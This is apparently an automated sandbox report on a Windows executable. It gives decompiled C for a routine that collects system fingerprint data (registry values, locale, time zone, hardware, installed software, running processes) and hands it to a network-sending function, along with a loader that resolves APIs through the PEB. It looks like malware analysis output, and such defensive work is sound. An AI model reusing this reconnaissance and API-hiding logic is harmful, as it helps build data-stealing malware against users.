				char _v188;
				char _v200;
				char _v212;
				char _v224;
				char _v236;
				char _v248;
				char _v260;
				char _v272;
				char _v284;
				struct _SYSTEM_INFO _v320;
				unsigned int _v336;
				signed int _v340;
				int _v348;
				short _v524;
				char _v612;
				char _v1612;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t422;
				long _t443;
				intOrPtr _t463;
				CHAR* _t512;
				long _t539;
				void* _t556;
				CHAR* _t557;
				void* _t576;
				intOrPtr _t596;
				long _t636;
				long _t690;
				struct _MEMORYSTATUSEX* _t691;
				unsigned int _t692;
				void* _t709;
				intOrPtr _t710;
				int _t711;
				void* _t773;
				void* _t792;
				void* _t815;
				unsigned int _t833;
				signed int _t839;
				signed int _t848;
				void* _t849;
				signed int _t850;
				void* _t852;
				void* _t854;
				char* _t896;
				CHAR* _t928;
				void* _t954;
				char* _t962;
				CHAR* _t981;
				void* _t1029;
				void* _t1030;
				void* _t1031;
				void* _t1032;
				signed int _t1043;

				_t1038 = __eflags;
				_t848 = __ecx;
				E004100ED( &_v16, __eflags, 0x411be1);
				_t844 = "\n";
				E0041018C(E00410208( &_v16, _t848,  &_v40, __eflags, "\n"), _t848,  &_v16);
				E00401859(_v40);
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1038,  *0x615508), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1038, "\n"), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v40, _t1038,  *0x61517c), _t848,  &_v16);
				E00401859(_v40);
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1038, "\n"), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v40, _t1038,  *0x615058), _t848,  &_v16);
				E00401859(_v40);
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1038, "\n\n"), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v40, _t1038,  *0x6150d8), _t848,  &_v16);
				E00401859(_v40);
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1038, "\n"), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v40, _t1038,  *0x615004), _t848,  &_v16);
				E00401859(_v40);
				_t422 = E0040E7D8( &_v40); // executed
				E0041018C(E004101C6( &_v16, _t848, _t422,  &_v28, _t1038), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E00401859(_v40);
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1038, _t844), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v40, _t1038,  *0x6152a0), _t848,  &_v16);
				E00401859(_v40);
				_v60 = 0xff;
				_t896 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t443 = RegOpenKeyExA(0x80000002,  *0x6152e4, 0, 0x20119,  &_v44); // executed
				_t1039 = _t443;
				if(_t443 == 0) {
					RegQueryValueExA(_v44,  *0x61537c, 0, 0, _t896,  &_v60); // executed
				}
				RegCloseKey(_v44);
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1039, _t896), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1039, _t844), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v40, _t1039,  *0x61554c), _t848,  &_v16);
				E00401859(_v40);
				_v44 = _v44 & 0x00000000;
				_push( &_v44);
				_push(GetCurrentProcess());
				if( *0x615778() == 0) {
					L4:
					_t463 =  *0x615214; // 0x6ba418
				} else {
					_t1041 = _v44;
					_t463 =  *0x6150cc; // 0x6ba2f8
					if(_v44 == 0) {
						goto L4;
					}
				}
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1041, _t463), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1041, _t844), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v40, _t1041,  *0x6150f8), _t848,  &_v16);
				E00401859(_v40);
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1041, E0040E8AD(_t848)), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1041, _t844), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v40, _t1041,  *0x615260), _t848,  &_v16);
				E00401859(_v40);
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1041, E0040E8DF(_t848)), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1041, _t844), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v40, _t1041,  *0x61519c), _t848,  &_v16);
				E00401859(_v40);
				_t512 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				GetLocalTime( &_v76);
				wsprintfA(_t512,  *0x615544, _v76.wYear & 0x0000ffff, _v76.wMonth & 0x0000ffff, _v76.wDay & 0x0000ffff, _v76.wHour & 0x0000ffff, _v76.wMinute & 0x0000ffff, _v76.wSecond & 0x0000ffff);
				_t1031 = _t1030 + 0x20;
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1041, _t512), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1041, _t844), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v40, _t1041,  *0x6152d0), _t848,  &_v16);
				E00401859(_v40);
				_t928 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t539 = GetTimeZoneInformation( &_v524); // executed
				if(_t539 != 0xffffffff) {
					_t839 = _v524;
					_t848 = 0xffffffc4;
					asm("cdq");
					_t1043 = _t839 % _t848;
					wsprintfA(_t928, "%d", _t839 / _t848);
					_t1031 = _t1031 + 0xc;
				}
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1043, _t928), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1043, _t844), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v40, _t1043,  *0x615394), _t848,  &_v16);
				E00401859(_v40);
				_t556 =  *0x615678( &_v524, 0x55);
				_t1044 = _t556;
				if(_t556 != 0) {
					_t557 = LocalAlloc(0x40, 5);
					_t935 = _t557;
					CharToOemW( &_v524, _t557);
				} else {
					_t935 = 0x411be1;
				}
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1044, _t935), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v28, _t1044, _t844), _t848,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t848,  &_v40, _t1044,  *0x6153f0), _t848,  &_v16);
				E00401859(_v40);
				_t576 = E0040E91A(_t1044,  &_v40); // executed
				_pop(_t849);
				E0041018C(E004101C6( &_v16, _t849, _t576,  &_v28, _t1044), _t849,  &_v16);
				E00401859(_v28.ACLineStatus);
				E00401859(_v40);
				E0041018C(E00410208( &_v16, _t849,  &_v28, _t1044, _t844), _t849,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t849,  &_v40, _t1044,  *0x6150fc), _t849,  &_v16);
				E00401859(_v40);
				if(GetSystemPowerStatus( &_v28) == 0) {
					L12:
					_t596 =  *0x615048; // 0x6b9700
				} else {
					_t1046 = _v28.BatteryFlag - 0x80;
					_t596 =  *0x615334;
					if(_v28.BatteryFlag >= 0x80) {
						goto L12;
					}
				}
				E0041018C(E00410208( &_v16, _t849,  &_v56, _t1046, _t596), _t849,  &_v16);
				E00401859(_v56);
				E0041018C(E00410208( &_v16, _t849,  &_v56, _t1046, _t844), _t849,  &_v16);
				E00401859(_v56);
				E0041018C(E00410208( &_v16, _t849,  &_v28, _t1046,  *0x6152ec), _t849,  &_v16);
				E00401859(_v28.ACLineStatus);
				_t954 = OpenProcess(0x410, 0, GetCurrentProcessId());
				_t1047 = _t954;
				if(_t954 != 0) {
					 *0x615780(_t954, 0,  &_v612, 0x104); // executed
					CloseHandle(_t954);
				}
				E004100ED( &_v40, _t1047,  &_v612);
				E0041018C(E004101C6( &_v16, _t849,  &_v40,  &_v56, _t1047), _t849,  &_v16);
				E00401859(_v56);
				E00401859(_v40);
				E0041018C(E00410208( &_v16, _t849,  &_v56, _t1047, _t844), _t849,  &_v16);
				E00401859(_v56);
				E0041018C(E00410208( &_v16, _t849,  &_v28, _t1047,  *0x6150c8), _t849,  &_v16);
				E00401859(_v28.ACLineStatus);
				_v60 = 0xff;
				_t962 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t636 = RegOpenKeyExA(0x80000002,  *0x61512c, 0, 0x20119,  &_v44); // executed
				_t1048 = _t636;
				if(_t636 == 0) {
					RegQueryValueExA(_v44,  *0x615420, 0, 0, _t962,  &_v60); // executed
				}
				RegCloseKey(_v44);
				E0041018C(E00410208( &_v16, _t849,  &_v56, _t1048, _t962), _t849,  &_v16);
				E00401859(_v56);
				E0041018C(E00410208( &_v16, _t849,  &_v56, _t1048, _t844), _t849,  &_v16);
				E00401859(_v56);
				E0041018C(E00410208( &_v16, _t849,  &_v28, _t1048,  *0x6152ac), _t849,  &_v16);
				E00401859(_v28.ACLineStatus);
				E0041018C(E00410208( &_v16, _t849,  &_v56, _t1048, E0040EA0D()), _t849,  &_v16);
				E00401859(_v56);
				E0041018C(E00410208( &_v16, _t849,  &_v56, _t1048, _t844), _t849,  &_v16);
				E00401859(_v56);
				E0041018C(E00410208( &_v16, _t849,  &_v28, _t1048,  *0x6153e0), _t849,  &_v16);
				E00401859(_v28.ACLineStatus);
				GetSystemInfo( &_v320); // executed
				wsprintfA( &_v1612, "%d", _v320.dwNumberOfProcessors);
				_t1032 = _t1031 + 0xc;
				E0041018C(E00410208( &_v16, _t849,  &_v56, _t1048,  &_v1612), _t849,  &_v16);
				E00401859(_v56);
				E0041018C(E00410208( &_v16, _t849,  &_v40, _t1048, _t844), _t849,  &_v16);
				E00401859(_v40);
				E0041018C(E00410208( &_v16, _t849,  &_v88, _t1048,  *0x615250), _t849,  &_v16);
				E00401859(_v88);
				_t981 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t690 = 0;
				do {
					 *((char*)(_t1029 + _t690 - 0x158)) = 0;
					if (_t690 != 0) goto L19;
					_t690 = _t690 + 1;
				} while (_t690 < 0x40);
				_t691 =  &_v348;
				_v348 = 0x40;
				GlobalMemoryStatusEx(_t691); // executed
				_t1052 = _t691 - 1;
				if(_t691 != 1) {
					_t850 = 0;
					_t692 = 0;
					__eflags = 0;
				} else {
					_t833 = _v336;
					_t850 = (_t833 << 0x00000020 | _v340) >> 0x14;
					_t692 = _t833 >> 0x14;
				}
				wsprintfA(_t981, "%d MB", _t850);
				E0041018C(E00410208( &_v16, _t850,  &_v56, _t1052, _t981), _t850,  &_v16);
				E00401859(_v56);
				E0041018C(E00410208( &_v16, _t850,  &_v88, _t1052, _t844), _t850,  &_v16);
				E00401859(_v88);
				E0041018C(E00410208( &_v16, _t850,  &_v28, _t1052,  *0x6150ac), _t850,  &_v16);
				E00401859(_v28.ACLineStatus);
				_t709 =  *0x61571c( *0x615038, 0, 0, 0, _t692);
				_v44 = _t709;
				_t710 =  *0x6156c8(_t709, 8);
				_v92 = _t710;
				_t711 =  *0x6156c8(_v44, 0xa);
				_v60 = _t711;
				 *0x615760(0, _v44);
				wsprintfA(RtlAllocateHeap(GetProcessHeap(), 0, 0x104), "%dx%d", _v92, _v60);
				E004100ED( &_v40, 0, _t714);
				E0041018C(E004101C6( &_v16, _t850,  &_v40,  &_v88, 0), _t850,  &_v16);
				E00401859(_v88);
				E00401859(_v40);
				E0041018C(E00410208( &_v16, _t850,  &_v260, 0, _t844), _t850,  &_v16);
				E00401859(_v260);
				E0041018C(E00410208( &_v16, _t850,  &_v248, 0,  *0x615510), _t850,  &_v16);
				E00401859(_v248);
				E0041018C(E00410208( &_v16, _t850,  &_v104, 0, _t844), _t850,  &_v16);
				E00401859(_v104);
				E0041018C(E004101C6( &_v16, _t850, E0040EACC( &_v236, 0),  &_v104, 0), _t850,  &_v16);
				E00401859(_v104);
				E00401859(_v236);
				E0041018C(E00410208( &_v16, _t850,  &_v224, 0,  *0x615528), _t850,  &_v16);
				E00401859(_v224);
				_t846 = "\n";
				E0041018C(E00410208( &_v16, _t850,  &_v152, 0, "\n"), _t850,  &_v16);
				E00401859(_v152);
				E0041018C(E00410208( &_v16, _t850,  &_v272, 0,  *0x615128), _t850,  &_v16);
				E00401859(_v272);
				E0041018C(E00410208( &_v16, _t850,  &_v188, 0, "\n"), _t850,  &_v16);
				E00401859(_v188);
				E0041018C(E00410208( &_v16, _t850,  &_v128, 0,  *0x61552c), _t850,  &_v16);
				E00401859(_v128);
				_t773 = E0040EB7A(0,  &_v212, 0x80000002); // executed
				_pop(_t852);
				E0041018C(E004101C6( &_v16, _t852, _t773,  &_v128, 0), _t852,  &_v16);
				E00401859(_v128);
				E00401859(_v212);
				E0041018C(E00410208( &_v16, _t852,  &_v284, 0, "\n"), _t852,  &_v16);
				E00401859(_v284);
				E0041018C(E00410208( &_v16, _t852,  &_v116, 0,  *0x6154f0), _t852,  &_v16);
				E00401859(_v116);
				_t792 = E0040EB7A(0,  &_v164, 0x80000001); // executed
				_pop(_t854);
				E0041018C(E004101C6( &_v16, _t854, _t792,  &_v116, 0), _t854,  &_v16);
				E00401859(_v116);
				E00401859(_v164);
				E0041018C(E00410208( &_v16, _t854,  &_v176, 0, "\n"), _t854,  &_v16);
				E00401859(_v176);
				E0041018C(E00410208( &_v16, _t854,  &_v200, 0, _t846), _t854,  &_v16);
				E00401859(_v200);
				E0041018C(E00410208( &_v16, _t854,  &_v140, 0,  *0x6154e4), _t854,  &_v16);
				E00401859(_v140);
				_t815 = E0040ED7B( &(_v76.wDayOfWeek), 0); // executed
				E0041018C(E004101C6( &_v16, _t854, _t815,  &_v140, 0), _t854,  &_v16);
				E00401859(_v140);
				E00401859(_v76.wDayOfWeek);
				_push( *0x61567c(_v16));
				_push(_v16);
				E004100ED(_t1032 + 0x20 - 0xc, 0,  *0x6151ec);
				E004016EB( &_a4, _t1032 + 0x20 - 0xffffffffffffffbc);
				_push( &(_v76.wDayOfWeek)); // executed
				E00403F95(_t854, 0); // executed
				E00401859(_v76.wDayOfWeek);
				E00401859(_v16);
				return E004016CC( &_a4);
			}

0x00409c83
0x00409c83
0x00409c97
0x00409c9c
0x00409cb0
0x00409cb8
0x00409cd1
0x00409cd9
0x00409ced
0x00409cf5
0x00409d0e
0x00409d16
0x00409d2a
0x00409d32
0x00409d4b
0x00409d53
0x00409d6b
0x00409d73
0x00409d8c
0x00409d94
0x00409da8
0x00409db0
0x00409dc9
0x00409dd1
0x00409dd9
0x00409dee
0x00409df6
0x00409dfe
0x00409e12
0x00409e1a
0x00409e33
0x00409e3b
0x00409e48
0x00409e5c
0x00409e74
0x00409e7a
0x00409e7c
0x00409e90
0x00409e90
0x00409e99
0x00409eae
0x00409eb6
0x00409eca
0x00409ed2
0x00409eeb
0x00409ef3
0x00409ef8
0x00409eff
0x00409f06
0x00409f0f
0x00409f1c
0x00409f1c
0x00409f11
0x00409f11
0x00409f15
0x00409f1a
0x00000000
0x00000000
0x00409f1a
0x00409f30
0x00409f38
0x00409f4c
0x00409f54
0x00409f6d
0x00409f75
0x00409f8e
0x00409f96
0x00409faa
0x00409fb2
0x00409fcb
0x00409fd3
0x00409fec
0x00409ff4
0x0040a008
0x0040a010
0x0040a029
0x0040a031
0x0040a040
0x0040a04c
0x0040a077
0x0040a07d
0x0040a08f
0x0040a097
0x0040a0ab
0x0040a0b3
0x0040a0cc
0x0040a0d4
0x0040a0e9
0x0040a0f2
0x0040a0fb
0x0040a0fd
0x0040a105
0x0040a106
0x0040a107
0x0040a110
0x0040a116
0x0040a116
0x0040a128
0x0040a130
0x0040a144
0x0040a14c
0x0040a165
0x0040a16d
0x0040a17b
0x0040a181
0x0040a183
0x0040a190
0x0040a196
0x0040a1a0
0x0040a185
0x0040a185
0x0040a185
0x0040a1b5
0x0040a1bd
0x0040a1d1
0x0040a1d9
0x0040a1f2
0x0040a1fa
0x0040a203
0x0040a20a
0x0040a219
0x0040a221
0x0040a229
0x0040a23d
0x0040a245
0x0040a25e
0x0040a266
0x0040a277
0x0040a284
0x0040a284
0x0040a279
0x0040a279
0x0040a27d
0x0040a282
0x00000000
0x00000000
0x0040a282
0x0040a298
0x0040a2a0
0x0040a2b4
0x0040a2bc
0x0040a2d5
0x0040a2dd
0x0040a2f6
0x0040a2f8
0x0040a2fa
0x0040a30b
0x0040a312
0x0040a312
0x0040a322
0x0040a337
0x0040a33f
0x0040a347
0x0040a35b
0x0040a363
0x0040a37c
0x0040a384
0x0040a391
0x0040a3a5
0x0040a3bd
0x0040a3c3
0x0040a3c5
0x0040a3d9
0x0040a3d9
0x0040a3e2
0x0040a3f7
0x0040a3ff
0x0040a413
0x0040a41b
0x0040a434
0x0040a43c
0x0040a455
0x0040a45d
0x0040a471
0x0040a479
0x0040a492
0x0040a49a
0x0040a4a6
0x0040a4be
0x0040a4c4
0x0040a4dc
0x0040a4e4
0x0040a4f8
0x0040a500
0x0040a519
0x0040a521
0x0040a536
0x0040a538
0x0040a53a
0x0040a53a
0x0040a544
0x0040a546
0x0040a547
0x0040a54c
0x0040a553
0x0040a55d
0x0040a563
0x0040a566
0x0040a57d
0x0040a57f
0x0040a57f
0x0040a568
0x0040a568
0x0040a574
0x0040a578
0x0040a578
0x0040a589
0x0040a5a1
0x0040a5a9
0x0040a5bd
0x0040a5c5
0x0040a5de
0x0040a5e6
0x0040a5f6
0x0040a5ff
0x0040a602
0x0040a60d
0x0040a610
0x0040a619
0x0040a61d
0x0040a640
0x0040a64d
0x0040a662
0x0040a66a
0x0040a672
0x0040a689
0x0040a694
0x0040a6b0
0x0040a6bb
0x0040a6cf
0x0040a6d7
0x0040a6f7
0x0040a6ff
0x0040a70a
0x0040a726
0x0040a731
0x0040a736
0x0040a74d
0x0040a758
0x0040a774
0x0040a77f
0x0040a796
0x0040a7a1
0x0040a7ba
0x0040a7c2
0x0040a7d3
0x0040a7db
0x0040a7ea
0x0040a7f2
0x0040a7fd
0x0040a814
0x0040a81f
0x0040a838
0x0040a840
0x0040a851
0x0040a859
0x0040a868
0x0040a870
0x0040a87b
0x0040a892
0x0040a89d
0x0040a8b4
0x0040a8bf
0x0040a8db
0x0040a8e6
0x0040a8ee
0x0040a906
0x0040a911
0x0040a919
0x0040a927
0x0040a928
0x0040a936
0x0040a943
0x0040a94b
0x0040a94c
0x0040a957
0x0040a95f
0x0040a96f

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

Part of subcall function 0040E7D8: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00411BE1), ref: 0040E7F8
Part of subcall function 0040E7D8: GetVolumeInformationA.KERNEL32(?,00000000,00000000,0040D419,00000000,00000000,00000000,00000000,?,?,00411BE1), ref: 0040E829
Part of subcall function 0040E7D8: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00411BE1), ref: 0040E86F
Part of subcall function 0040E7D8: RtlAllocateHeap.NTDLL(00000000), ref: 0040E876

Part of subcall function 004101C6: lstrcpy.KERNEL32(00000000,?), ref: 004101F4
Part of subcall function 004101C6: lstrcat.KERNEL32(?,00000000), ref: 004101FE

GetProcessHeap.KERNEL32(00000000,00000104,00414044,00414044,0041407C,00414044,00414044,00414044,00411BE1,?,?,?), ref: 00409E4F
RtlAllocateHeap.NTDLL(00000000), ref: 00409E56
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?,?,?,?), ref: 00409E74
RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,000000FF,?,?,?), ref: 00409E90
RegCloseKey.ADVAPI32(?,?,?,?), ref: 00409E99
GetCurrentProcess.KERNEL32(00000000,00414044,00000000,?,?,?), ref: 00409F00
IsWow64Process.KERNEL32(00000000,?,?,?), ref: 00409F07
GetProcessHeap.KERNEL32(00000000,00000104,00414044,00000000,00414044,00000000,00414044,006BA418,?,?,?), ref: 0040A039
RtlAllocateHeap.NTDLL(00000000), ref: 0040A040
GetLocalTime.KERNEL32(?,?,?,?), ref: 0040A04C
wsprintfA.USER32 ref: 0040A077
GetProcessHeap.KERNEL32(00000000,00000104,00414044,00000000), ref: 0040A0DC
RtlAllocateHeap.NTDLL(00000000), ref: 0040A0E3
GetTimeZoneInformation.KERNEL32(?), ref: 0040A0F2
wsprintfA.USER32 ref: 0040A110
GetUserDefaultLocaleName.KERNEL32(?,00000055,00414044,00000000), ref: 0040A17B
LocalAlloc.KERNEL32(00000040,00000005), ref: 0040A190
CharToOemW.USER32(?,00000000), ref: 0040A1A0
GetSystemPowerStatus.KERNEL32(?), ref: 0040A26F
GetCurrentProcessId.KERNEL32(00414044,006B9700), ref: 0040A2E2
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0040A2F0
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0040A30B
CloseHandle.KERNEL32(00000000), ref: 0040A312
GetProcessHeap.KERNEL32(00000000,00000104,00414044,?), ref: 0040A398
RtlAllocateHeap.NTDLL(00000000), ref: 0040A39F
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000), ref: 0040A3BD
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF), ref: 0040A3D9
RegCloseKey.ADVAPI32(00000000), ref: 0040A3E2
GetSystemInfo.KERNEL32(?,00414044,00000000,00414044,00000000), ref: 0040A4A6
wsprintfA.USER32 ref: 0040A4BE
GetProcessHeap.KERNEL32(00000000,00000104,00414044,?), ref: 0040A529
RtlAllocateHeap.NTDLL(00000000), ref: 0040A530
GlobalMemoryStatusEx.KERNEL32(00000000), ref: 0040A55D
wsprintfA.USER32 ref: 0040A589
GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040A625
RtlAllocateHeap.NTDLL(00000000), ref: 0040A62C
wsprintfA.USER32 ref: 0040A640

Part of subcall function 0040EB7A: RegOpenKeyExA.KERNEL32(D@AD@A,00000000,00020019,80000002,00411BE1,00000000,?), ref: 0040EBB7

Part of subcall function 0040EB7A: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,00414044), ref: 0040EBF9
Part of subcall function 0040EB7A: wsprintfA.USER32 ref: 0040EC23
Part of subcall function 0040EB7A: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0040EC40
Part of subcall function 0040EB7A: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 0040EC6A
Part of subcall function 0040EB7A: lstrlen.KERNEL32(?), ref: 0040EC7F
Part of subcall function 0040EB7A: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,004140D4), ref: 0040ECEC

Part of subcall function 0040ED7B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040EDA0
Part of subcall function 0040ED7B: Process32First.KERNEL32(00000000,00000128), ref: 0040EDB0
Part of subcall function 0040ED7B: Process32Next.KERNEL32(00000000,00000128), ref: 0040EE02
Part of subcall function 0040ED7B: FindCloseChangeNotification.KERNEL32(00000000), ref: 0040EE0D

lstrlen.KERNEL32(?,00414044,00414044,00414044,00414044,00414044,00414044,00414044,00000000), ref: 0040A921

Part of subcall function 00403F95: lstrlen.KERNEL32(?), ref: 00403FEE
Part of subcall function 00403F95: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040403D
Part of subcall function 00403F95: StrCmpCA.SHLWAPI(?), ref: 00404052

Strings

@, xrefs: 0040A553
%dx%d, xrefs: 0040A63A
%d MB, xrefs: 0040A583

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Heap$Process$Allocate$Openwsprintf$CloseQueryValuelstrcpylstrlen$CurrentInformationLocalNameProcess32StatusSystemTimelstrcat$AllocChangeCharCreateDefaultDirectoryEnumFileFindFirstGlobalHandleInfoInternetLocaleMemoryModuleNextNotificationPowerSnapshotToolhelp32UserVolumeWindowsWow64Zone
String ID: %d MB$%dx%d$@
API String ID: 1885477443-1924514118
Opcode ID: 3f5ba9f01ffc60f1a21f64a0c8dbfa604d91811e84aeb6083b5bf2bb2704c293
Instruction ID: b4ca88a3ba77d3bb8852a9a002aacf1c3112a4e0e2d909bc93345b0692052258
Opcode Fuzzy Hash: 3f5ba9f01ffc60f1a21f64a0c8dbfa604d91811e84aeb6083b5bf2bb2704c293
Instruction Fuzzy Hash: 5482A632D0011DEBCF10FBA1DC469CDB779AF04308F1581AAE616B7161DB796F868B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F49D Relevance: 56.2, APIs: 31, Strings: 1, Instructions: 159
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0040F49D(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t22;
				struct HINSTANCE__* _t23;
				_Unknown_base(*)()* _t24;
				intOrPtr* _t30;
				struct HINSTANCE__* _t54;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				_t54 = _v8;
				 *0x615798 = _t54;
				if(_t54 != 0) {
					_t30 = E0040F40F(__ecx);
					 *0x6156d8 = _t30;
					 *0x61560c =  *_t30(_t54,  *0x615158);
					 *0x61575c = GetProcAddress( *0x615798,  *0x6154ec);
					 *0x615600 = GetProcAddress( *0x615798,  *0x615558);
					 *0x61574c = GetProcAddress( *0x615798,  *0x6151b8);
					 *0x615628 = GetProcAddress( *0x615798,  *0x6151a4);
					 *0x615608 = GetProcAddress( *0x615798,  *0x615244);
					 *0x61579c = GetProcAddress( *0x615798,  *0x615408);
					 *0x615788 = GetProcAddress( *0x615798,  *0x615288);
					 *0x615660 = GetProcAddress( *0x615798,  *0x6154d4);
					 *0x615670 = GetProcAddress( *0x615798,  *0x615478);
					 *0x615714 = GetProcAddress( *0x615798,  *0x615304);
					 *0x615748 = GetProcAddress( *0x615798,  *0x615238);
					 *0x61573c = GetProcAddress( *0x615798,  *0x615520);
					 *0x6157e8 = GetProcAddress( *0x615798,  *0x615018);
					 *0x6157ac = GetProcAddress( *0x615798,  *0x6154cc);
					 *0x6157c4 = GetProcAddress( *0x615798,  *0x615178);
					 *0x61567c = GetProcAddress( *0x615798,  *0x615360);
					 *0x6156e4 = GetProcAddress( *0x615798,  *0x615548);
					 *0x6157ec = GetProcAddress( *0x615798,  *0x615024);
					 *0x615704 = GetProcAddress( *0x615798,  *0x615084);
					 *0x61570c = GetProcAddress( *0x615798,  *0x615204);
				}
				 *0x6155dc = LoadLibraryA( *0x615480);
				 *0x6156e8 = LoadLibraryA( *0x6150d4);
				 *0x6157cc = LoadLibraryA( *0x61505c); // executed
				_t17 = LoadLibraryA( *0x615134); // executed
				 *0x6156a0 = _t17;
				 *0x6156cc = LoadLibraryA( *0x615274);
				_t19 =  *0x6155dc; // 0x76170000
				if(_t19 != 0) {
					 *0x6156ac = GetProcAddress(_t19,  *0x6153e8);
				}
				_t20 =  *0x6156e8; // 0x76130000
				if(_t20 != 0) {
					 *0x61571c = GetProcAddress(_t20,  *0x61536c);
					 *0x6156c8 = GetProcAddress( *0x6156e8,  *0x615124);
				}
				_t21 =  *0x6157cc; // 0x762b0000
				if(_t21 != 0) {
					 *0x615760 = GetProcAddress(_t21,  *0x6152e0);
				}
				_t22 =  *0x6156a0; // 0x76b00000
				if(_t22 != 0) {
					 *0x615728 = GetProcAddress(_t22,  *0x615080);
				}
				_t23 =  *0x6156cc; // 0x77090000
				if(_t23 != 0) {
					_t24 = GetProcAddress(_t23,  *0x61535c);
					 *0x61578c = _t24;
					return _t24;
